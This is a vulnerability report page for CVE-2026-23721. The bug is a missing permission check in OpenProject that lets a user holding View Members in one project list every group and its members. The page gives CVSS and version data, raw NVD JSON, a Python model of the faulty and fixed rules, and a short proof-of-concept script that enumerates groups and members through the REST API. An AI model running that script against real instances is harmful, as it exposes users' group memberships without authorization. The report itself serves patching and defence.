Security Vulnerability Report
CVE-2026-23721 CVSS 4.3 MEDIUM

Published: 2026-01-19 18:16:06
Last Modified: 2026-02-02 20:44:39

Description

OpenProject is an open-source, web-based project management application. When groups are used to manage users, a group's members should be visible only to users who hold the View Members permission in a project of which the group is itself a member. Prior to versions 17.0.1 and 16.6.5, a missing authorization check (CWE-862) meant that a user holding View Members in any single project could enumerate every group on the instance and see which users belong to each one. The issue is fixed in OpenProject 17.0.1 and 16.6.5. No workarounds are known, so upgrading is the only mitigation.
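The access rule from the description, modelled in Python as an added illustration (this is not OpenProject's code; the users, projects, groups and permission names below are constructed for the example). The vulnerable predicate only asks whether the user holds View Members somewhere, so one qualifying project unlocks every group; the corrected predicate ties each group to a project the user is actually allowed to inspect.

```python
"""Model of the group-visibility rule behind CVE-2026-23721.
Added illustration, not OpenProject's code; all data is constructed."""

VIEW_MEMBERS = "view_members"

# Constructed sample data: each project lists its member principals
# (users and groups) and the permissions each user holds there.
PROJECTS = {
    "website": {
        "members": {"alice", "bob", "web-team"},
        "permissions": {
            "alice": {VIEW_MEMBERS, "view_work_packages"},
            "bob": {"view_work_packages"},
        },
    },
    "finance-ops": {
        "members": {"carol", "finance"},
        "permissions": {"carol": {VIEW_MEMBERS}},
    },
}
GROUPS = {
    "web-team": {"alice", "dave"},
    "finance": {"carol", "erin"},
}


def projects_with_view_members(user):
    """Projects in which `user` holds the View Members permission."""
    return {name for name, p in PROJECTS.items()
            if VIEW_MEMBERS in p["permissions"].get(user, set())}


def visible_groups_vulnerable(user):
    """Behaviour before 17.0.1 / 16.6.5 as described in the advisory: the
    check only asks whether the user has View Members *anywhere*, so a single
    qualifying project discloses every group on the instance."""
    if projects_with_view_members(user):
        return set(GROUPS)
    return set()


def visible_groups_fixed(user):
    """Intended rule: a group is visible only if it is itself a member of a
    project where the user holds View Members."""
    allowed = projects_with_view_members(user)
    return {g for g in GROUPS
            if any(g in PROJECTS[p]["members"] for p in allowed)}


def group_members(user, group, check=visible_groups_fixed):
    """Membership listing gated by the chosen visibility rule.
    Returns None when the group must not be disclosed to `user`."""
    if group not in check(user):
        return None
    return set(GROUPS[group])


if __name__ == "__main__":
    # alice has View Members only in "website"; the vulnerable rule still
    # lets her see the "finance" group and its members.
    for rule in (visible_groups_vulnerable, visible_groups_fixed):
        print(f"{rule.__name__}: alice sees {sorted(rule('alice'))}")
```

Run it as a script to see the two rules side by side for the same user; the fixed rule is the one a patched instance should behave like, and a quick way to check an upgrade is to confirm that a user with View Members in a single project no longer sees groups that belong to other projects.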

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* (all versions before 16.6.5) - VULNERABLE
cpe:2.3:a:openproject:openproject:17.0.0:*:*:*:*:*:*:* - VULNERABLE
OpenProject < 16.6.5 (fixed in 16.6.5)
OpenProject 17.0.0 (fixed in 17.0.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
from requests.auth import HTTPBasicAuth

target = "http://target-openproject.com"
# API key of a user that holds "View Members" in at least one project.
api_token = "user_api_token_with_view_members_permission"
# OpenProject API keys are sent as HTTP Basic auth with the literal user name
# "apikey"; a Bearer header is only accepted for OAuth access tokens.
auth = HTTPBasicAuth("apikey", api_token)

# Enumerate all groups. API v3 returns a HAL collection, so the elements live
# under _embedded.elements rather than at the top level of the response.
groups_response = requests.get(f"{target}/api/v3/groups", auth=auth, timeout=30)
groups_response.raise_for_status()
groups = groups_response.json()["_embedded"]["elements"]
print(f"Found {len(groups)} groups")
for group in groups:
    print(f"Group: {group['name']}, ID: {group['id']}")
    # On an unpatched instance every group is listed; fetch each one to read its
    # members (user links under _links.members in the API v3 group representation).
    detail = requests.get(f"{target}/api/v3/groups/{group['id']}", auth=auth, timeout=30).json()
    for member in detail.get("_links", {}).get("members", []):
        print(f"  member: {member.get('title')} ({member.get('href')})")
```

References

https://github.com/opf/openproject/security/advisories/GHSA-vj77-wrc2-5h5h (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23721", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:05.730", "lastModified": "2026-02-02T20:44:39.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. When using groups in OpenProject to manage users, the group members should only be visible to users that have the View Members permission in any project that the group is also a member of. Prior to versions 17.0.1 and 16.6.5, due to a failed permission check, if a user had the View Members permission in any project, they could enumerate all Groups and view which other users are part of the group. The issue has been fixed in OpenProject 17.0.1 and 16.6.5. No known workarounds are available."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Cuando se utilizan grupos en OpenProject para gestionar usuarios, los miembros del grupo solo deberían ser visibles para los usuarios que tienen el permiso 'Ver miembros' en cualquier proyecto del que el grupo también sea miembro. Antes de las versiones 17.0.1 y 16.6.5, debido a una comprobación de permisos fallida, si un usuario tenía el permiso 'Ver miembros' en cualquier proyecto, podía enumerar todos los Grupos y ver qué otros usuarios formaban parte del grupo. El problema ha sido solucionado en OpenProject 17.0.1 y 16.6.5. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.5", "matchCriteriaId": "4C6FE059-AB36-4883-AE55-2E65FDE51BD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:17.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "78FA3834-A1AB-4489-AE2A-2C7FAE9B619F"}]}]}], "references": [{"url": "https://github.com/opf/openproject/security/advisories/GHSA-vj77-wrc2-5h5h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```